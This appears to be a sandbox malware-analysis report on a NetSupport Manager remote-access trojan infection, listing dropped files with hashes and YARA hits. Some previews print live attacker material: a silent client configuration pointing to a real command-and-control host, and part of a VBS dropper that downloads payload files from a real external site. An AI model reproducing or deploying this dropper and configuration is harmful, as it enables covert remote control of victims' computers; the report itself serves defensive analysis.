                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):120288
                                                                                      Entropy (8bit):5.251370253406986
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:o+N4gcCvlwwYBg6vJcaW3eSu+ee/WjHwlee/UjH3:z4ZEROJcaieSreHj4eljX
                                                                                      MD5:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                      SHA1:3C37EE9757CF6AB21F4876529436E15D14DA700B
                                                                                      SHA-256:FFBD328E86899F332ED8CB4A31B93814D363034793D875B871D44EBD0C5414BC
                                                                                      SHA-512:96982BFDD8334684F832DC3F5B36288F63E5F210F4AAF14B7A630A367E5BEF8FFAB13BC1C7193BE5E2D210179598ABC654DAE5A412F844856B292A2A3199EF05
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77280
                                                                                      Entropy (8bit):6.755047083861626
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lPSdA+F6mXkAShLY9w5VnC6ee/GjHAfee/EOjH3:ladbQUShLY9w5VnC6enj2ekjX
                                                                                      MD5:92E0CD73327A7C8B0FDAD0B26F883895
                                                                                      SHA1:9C053C38BA7AC4720EBD55C1FD1F651508170230
                                                                                      SHA-256:E1E8946A82898C48E8D61AC398D3C548CC462A555EE41C67BDDC79FFBD131741
                                                                                      SHA-512:1F1161C6FF81046B468CEB3417AF88859F6D7E39D3CAA3BED692578084929037E478A84F9C9E409BC24B4919B6309A6B2FC82B7865E2CA1C5234970E317A92F4
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):24470496
                                                                                      Entropy (8bit):5.634476864287587
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:QWrPg1mPv8hXPx8Fv3Cwa/cs/Rp0se9YMg212:Q2Hv8hfeFvy3h/Rpve2rZ
                                                                                      MD5:9741168634198501D2907B3C10683D4E
                                                                                      SHA1:59153955D1DDB7EFD4B6BD9A0D24AD67938B5A14
                                                                                      SHA-256:D04A3992534AF3D8826D1F579FEDCE7477929EAC01E883063EACAA424D3F5218
                                                                                      SHA-512:1BEE509F17AB29D12FD2963A5F1EAF5592166215AA5C7BF570BFEBA1455D48DC64FC04DAEAA6F4C17FA8B0ECAF71D18DA6207E417C03713012CD27D8E9E019F5
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22656
                                                                                      Entropy (8bit):6.252604525322096
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:fFZj8MgCiZetfffX3/9e0mfu2rjWevHqnYPL7NCUHeMZR:f8MXlfffX3/9e3z2evqEdR
                                                                                      MD5:84DEE0F25FE97868071202065DAB63BB
                                                                                      SHA1:64A6C2E0D4561A726BDCE5491D12693A96C45839
                                                                                      SHA-256:DE5ACE5C2A02AFB01A90BA39B305A8F3C783883012432D22912910EAD44AD60A
                                                                                      SHA-512:200A162CAD66B4EAF94B02F31FA6986028B42EA4497D234131CE3F6B8154146C00881FC75F63B077B0CCDD47A62340440884EFF2199F00D4F035622903FB8D1F
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):506
                                                                                      Entropy (8bit):4.906453708261214
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                      MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                      SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                      SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                      SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                      Malicious:false
                                                                                      Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):39392
                                                                                      Entropy (8bit):7.268505171847185
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:vnIX3dawZwW87doDaK8r2pe/42/HDHf/ck6r2pe/s3zHDHf/ckW/:C3dFGWTO3ee/46jHeee/sDjHC
                                                                                      MD5:53608AEEEF65674552C7A28A4F918D1F
                                                                                      SHA1:DABE4E6DC6A7CF446BA76BDA7F18AAE7B08177E4
                                                                                      SHA-256:C8B9142A399CB7171F05379E34D4D1D34659A033FD99E994BABA103E6D0D8FE3
                                                                                      SHA-512:DF58AA3E582986B80A2FA3CD395B14357ABEC7A50FA790E1723F0F9B37477476782169EC86EC259ED210C4CBC1241EF1336182AAE5C6C87994D0B00D7C16A074
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):39904
                                                                                      Entropy (8bit):7.13635504885649
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:0E4XbRSshW4r2pe/6qHDHf/ckF6Nr2pe/XfJHDHf/ckbmr:uLktYee/vjHh6Jee/XRjHGr
                                                                                      MD5:834B482E183006E4CA6644CBA6F7A1A8
                                                                                      SHA1:E80B54FD273A31B6E70EA1514ABAE2B931E126D2
                                                                                      SHA-256:D0F829E161FB425667DAB3CAE56BFD3F0CC753145606A518B1C38BB5DCD4C100
                                                                                      SHA-512:3592A9540C9F5C33009E577449A426A8E1843E7F908178C911BD4410871B455485F2CE006D5BE5C2146C29252407BC9E11A6D8A583EF75CE73006444C7477E3B
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77280
                                                                                      Entropy (8bit):6.793769574007511
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:1fafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/MjHFee/s3jH9:1afLSpAFUzt0LLIywYeZjleRjd
                                                                                      MD5:B25AE8C65D0BAF1AD9B51DBF7E0E738A
                                                                                      SHA1:29EDDB6C96B9A58302B5FDF85919A231F448970A
                                                                                      SHA-256:340328207279A098B5C8CAFDF3A6E2DEB28C06C077D04423E084EBAD93353B83
                                                                                      SHA-512:8C22BF990978C752F6E6292CFB75B31228369E4B77D68DAA912D26302449217830E5C305446840765D3FB3F10EA575CE695A165E835570F0BC1DB44F2AB49BDA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46832
                                                                                      Entropy (8bit):6.550943579230967
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:aYxDdwTWm8lJuEFer2pe/p+DHDHf/cklPr2pe/a/fHDHf/ckT:aYDwTelJuEFuee/kjHRee/OjHv
                                                                                      MD5:856CE968807C6915FE987E5D39FCC701
                                                                                      SHA1:30F881812243B98424BB22ED7CCD911E2BD0E2A1
                                                                                      SHA-256:96E0F092E8E930D0989AED462789045392C9159132A35DDDA513C18E495ADDBA
                                                                                      SHA-512:1D1500F95797CFC61728D10F17E1F22762DD7848CD5D8EA978A22170756C77AC9A5A2AC182C137DE8A49E149034CCBF6DA11547B757AFC90581DBABC90D1B048
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 301 x 50 x 24, image size 45202, resolution 2834 x 2834 px/m, cbSize 45256, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):45256
                                                                                      Entropy (8bit):1.7322107663428339
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:9w+PTPP6Q9k+BIwe0WRpLmfL8TkLUtyAeCzNPzat1Arxtgx/:9w+rPTTD8T90r6t+x
                                                                                      MD5:E9FCFFB9D2942FB4F8693D0955741C02
                                                                                      SHA1:7BE4057624103FD3A5A6127DD205797F0750DE5D
                                                                                      SHA-256:1D88DC4653BA74CFB65B74EA23CFA42B38A7A9367420C801E1267C27D218C740
                                                                                      SHA-512:9B01B09181BDDF01468B6D1AD61084D27F9FADDD1992A9B0449DA661E2BCFE443C0F668871676DF94E871DBDD9BB4F2F65E175C291AEAE4E1C007FEE6348E4E4
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2102752
                                                                                      Entropy (8bit):6.453089786609498
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:e4PM40C89/wp1LsHQFT0qr/H8tTrp7zUbMwOi9NR/Feoke6fUiWZF7tfTHdWq:e4EG8a/sHQFTZHeTrp7zUbMwZhF7ke6W
                                                                                      MD5:A14A67BADCAFD7F70925865FC36CF23A
                                                                                      SHA1:987160B998D3C84DA5EA4A3D7687DC4B5B14F6A3
                                                                                      SHA-256:EB8529698A60A96E2224C298AE0CB8365A46898082CCCFE79356B23057A02A6C
                                                                                      SHA-512:AA592B65CB7DB2CC8D8E8F47E1CB1810F3BDF52D44724BB3902D04FFC73BDBDC80E4A0509F25E33A4C3D2C67BD2BB0E9CB6D0C77DF2E48FD1AFD277B3B3F1183
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):15766
                                                                                      Entropy (8bit):2.0905725373226205
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:K4S8+k29W8sEvVQAxN+Y9HC5TZ/gBCNLNLXC54x4I7cdpanub7Te7gMHDI31t+jY:XS5kEWR4QAxNXqdv34CcXjTe7uFiY
                                                                                      MD5:515B10CD836D4F5874037A43F1E77451
                                                                                      SHA1:8ADF1CE3954CF17169F468ED4DD350B0FD5C4CDA
                                                                                      SHA-256:90FF8555B7DBFE2CFE5D2761CCC491153B7C42085E0C490970BF9EB3C150F25A
                                                                                      SHA-512:9CEA72979FD5EA34579E67E9E17D6AF2F6FD354A88573A3D878DFDDF3C0AFD94FA02ABB42C5BCEB6F9D208BEC194018733B8EDA075ED8D36F7CE16C5402AFE2B
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):4081
                                                                                      Entropy (8bit):7.869168767091338
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:NZ/I09Da01l+gmkyTt6Hk8nTo2IbRDzqMYCKg:NS0tKg9E05TovbRDznYE
                                                                                      MD5:0A5913FD6ECAE07F96F1FE4D2E9BE596
                                                                                      SHA1:C2CF5940D9FFED0E48A4C9BDB267A26132A6F7CD
                                                                                      SHA-256:3A7D175DC12A1A71DD4E1842321B03BDCD3E35F4AEA38D594E02A5AC883DD1C6
                                                                                      SHA-512:7BC5BD2785087655A58345171CCDB417FCA4AB4B1F74C743DDA853EEFA6F4A823A49B9172580BA4547CCD56E4BE095F8D9ACF5B6E83C2EAF56D5EA594434F8BA
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):15345
                                                                                      Entropy (8bit):1.827778496152507
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:K4S8+k29W8sEv7BNBhxN+Y9Wn8+BC6tjLixBZI7cdpanub7ZQy7AZ:XS5kEWRyBNBhxNXW82KBZCcXjegI
                                                                                      MD5:51957F938C93454E2F3ED13519EBBFC6
                                                                                      SHA1:DF094723F61FEC1111C496D2AFC89FDE0EF80A44
                                                                                      SHA-256:A0EA911CFDF05131B779DE0816B0BEC0D833A9DA1B49AACB098B84A0F871CF56
                                                                                      SHA-512:3723A1C0314AE2396ED2E062F111762B4ED927A062876F189105FC46B9606B326934484C027DDD49F02BC273C924D40A7C96C0CC6375857D6A622CB8F631A72D
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):883712
                                                                                      Entropy (8bit):6.824170675528273
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:0WmPrDND1ONC1r4pD84TfEXpS8sYsen/mKvTZuoy4YJp:DmPrBu1ygr
                                                                                      MD5:8ED02A1A11CEC72B6A6A4989BF03CFCC
                                                                                      SHA1:172908FF0F8D7E1C0CBF107F7075ED1DBA4B36C8
                                                                                      SHA-256:4FD02F2699C49579319079B963425991198F59CB1589B8AFA8795B5D6A0E5DB3
                                                                                      SHA-512:444FE62A5C324D38BDC055D298B5784C741F3CA8FAAEAED591BD6DCF94205DBF28C7D7F7D3825CCB99EFF04E3FFD831E3F98D9B314820841A0C0960AE6A5E416
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):274256
                                                                                      Entropy (8bit):6.569709751417913
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:x4fMnGHxUCkewyeWmUyuueIDKTukcHWu2vizgPSA4qJH9013iSI3s:+fLHyApeWm4uTdkIWRizxkW1R
                                                                                      MD5:F45BBAC53C6DD05436F749ECBF22C1F2
                                                                                      SHA1:5F76AF19249B49505C36593434B68229357F52F9
                                                                                      SHA-256:0B85176125FC996D22B08D25A3344FC1E9C19ECC8A39D291F90ADB98EBAD6268
                                                                                      SHA-512:5B6BAE76F1A6CC8AA09E63802F157A53AC441608A158770FDCA5DE532BD74AA895AD8CB429A6A7CEE93844D7DE5882C0F1BC3BB433F4D1A9EC9FA6E1A5DEE5AA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):87360
                                                                                      Entropy (8bit):6.8832723005665555
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Q7cAKWRMbpuRQci+7uXTKLWe+27JofZo0ENm2eK7oJnoUSgpAY8ODcDcm7cIsXFf:Q73KiRQcJ7uj8f7Jofm0ENm2eK7mnoU5
                                                                                      MD5:479349B9C24C0A52F504292544492ACC
                                                                                      SHA1:70DA788FA83DDD85FF72308D176352FB87C3D01D
                                                                                      SHA-256:CBCA683F6832E6AEA627F6BCA32788BBA056B78F3ED43015B6B45F8B22407C1F
                                                                                      SHA-512:890973D08EA2D02C88356CE75C64B608E05B153EDFD83C748A407E965A781321198D91A09C6573E9EEE1A3853A7C92E0283F9556878DF3C5776FDEBA78659A18
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):345056
                                                                                      Entropy (8bit):6.291223638483511
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:I8RXllwWOZL6CrguQ4fPBIT2TxwyJMIL39+/ziP+9iBIcUaemeL:IUXDIZmydPTvb4RAVcbL
                                                                                      MD5:96E987D909600D34DD70C55F56EB8869
                                                                                      SHA1:3278FFE286AD6894685D5C4248E2E4EBB729E4E2
                                                                                      SHA-256:E627780C49513DFDDF394A5FE929C67D527256AF7407F2AE6CFA6A6996859F9A
                                                                                      SHA-512:DA9BE7015AAB9C447D5A72067BD6704165C56F3E355BA62018F809E6B7F0DC2D20040419A1366CB5DDAFA1EB6CEB51173EF382D214F130F6CA06175747B4B60A
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):97376
                                                                                      Entropy (8bit):6.023234574132757
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:hkybYM1RAFHKrvngTwjhVkHtf0Y8L2dwz/ET9HB1kzQNlkm2aDCCR:7kM1RAFHKrvnYwjhVkHtsYU2dwoTZ3bb
                                                                                      MD5:52B88EB20BEB3B34A692A4CAE0FF2196
                                                                                      SHA1:26A297B2BAEB118F8856C1DE41EE855572BA958A
                                                                                      SHA-256:2B675E9C27D3FB01CB9DF2583B380DE8DC8C0D5BBBE18AF458F90B47C6D62B03
                                                                                      SHA-512:29567FC4DB46D85F9AB8F6ECF2A708EC2C8DEF2E49ECCD439DACEDA327B7411957B2014171A8370C3928D4A03A13BC6124D93678A87684370A5E6042D1C2AD6E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70240
                                                                                      Entropy (8bit):5.649795184953094
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:p8c59WTkwv6MY2d7kz/ET9Hx2aOlP30Bhs1RQuX210ze9MQN7Z2ym+4lcf7xl8uF:qqi8L2dwz/ET9HB1kzQNlkYjaDCCM
                                                                                      MD5:9A348ED02F8B1EFC9BFC5F53827F8A9C
                                                                                      SHA1:C1F22705392AF57B277D1FB4F46258DDDFFE8F33
                                                                                      SHA-256:641F2B86F013A95707FFDF0F584E3A83FEDC1392CEA3B546905B9CCB54AE10CF
                                                                                      SHA-512:9DEBB460FD74CB586ED66B7FA4BBB51A8E1184C1A061E81F4FD6F5E700FDB1E91B809A3F517FE55DD889F60DF6EA29190455073DFA1CB5B85032B91EFD12033F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:PEM certificate
                                                                                      Category:dropped
                                                                                      Size (bytes):54748
                                                                                      Entropy (8bit):5.984753862317494
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:WixFWJLb031BOK0OdWEbZht4SsOlHCxJTLNmG4os:WixFWdADOVOIEbZhUOlcpLUG4os
                                                                                      MD5:FC57FB86C8C5974AE2399BBDDDD686A4
                                                                                      SHA1:214EE9F94FAD675ECB8DC0311E9126871209867B
                                                                                      SHA-256:EBAD57E60598E885A5E3E6C7E61EA5504388BEB7D9D855F8AB32958AAF5D1C70
                                                                                      SHA-512:E8E748D85652331762E4A4F49F41D9F9CF9E053FCD6DDBE69DC1766E4188B43A7021F0293D856D476E4C908D240A2F8BA22AEC26B5D02057BBC6C870C88B0747
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\vrep[1].msi, Author: Joe Security
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2891
                                                                                      Entropy (8bit):4.051212311792211
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:ez+xD8KvBvtvUlvLvMIlubCKvBvtvUlvgvPxI1iKvBvtvUlvKvCwQY1J:e2rZFMlzXMtZFMlonq1hZFMlCqBYz
                                                                                      MD5:905AD4C0382EAE16DF4C0DEA8E4D2FCC
                                                                                      SHA1:6597192580595528A3A24CF94C4B44E44CFA6BE4
                                                                                      SHA-256:49F4E7CDD3716A8E33A6659DAA709606A4D74AE84525FA395EFD8687F7E9D2AE
                                                                                      SHA-512:CC5784D1DA871001A838D9EA2AC774CC727CB0D0F8CB76F05AE76FD35FD4BFF86BF3418B4ABF32F9477F25FBB7710A3FC961072CC95E1A4AFD83C7A19DCBAA09
                                                                                      Malicious:true
                                                                                      Preview:On Error Resume Next.. Dim xmlHttp, fileSystem, tempFolder, targetFile, binaryStream, nsmFile, clientFile.... ' init.. Set xmlHttp = CreateObject("MSXML2.XMLHTTP").. Set fileSystem = CreateObject("Scripting.FileSystemObject").. Set tempFolder = fileSystem.GetSpecialFolder(2) ' Folder %TEMP%.... ' dl NSM.lic.. nsmFile = tempFolder & "\NSM.lic".. xmlHttp.Open "GET", "https://okolinabeauty.com/choh/NSM.lic", False.. xmlHttp.Send.. If xmlHttp.Status = 200 Then.. Set binaryStream = CreateObject("ADODB.Stream").. binaryStream.Type = 1 ' bin.. binaryStream.Open.. binaryStream.Write xmlHttp.responseBody.. binaryStream.SaveToFile nsmFile, 2.. binaryStream.Close.. End If.... ' dl Client32.ini..
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
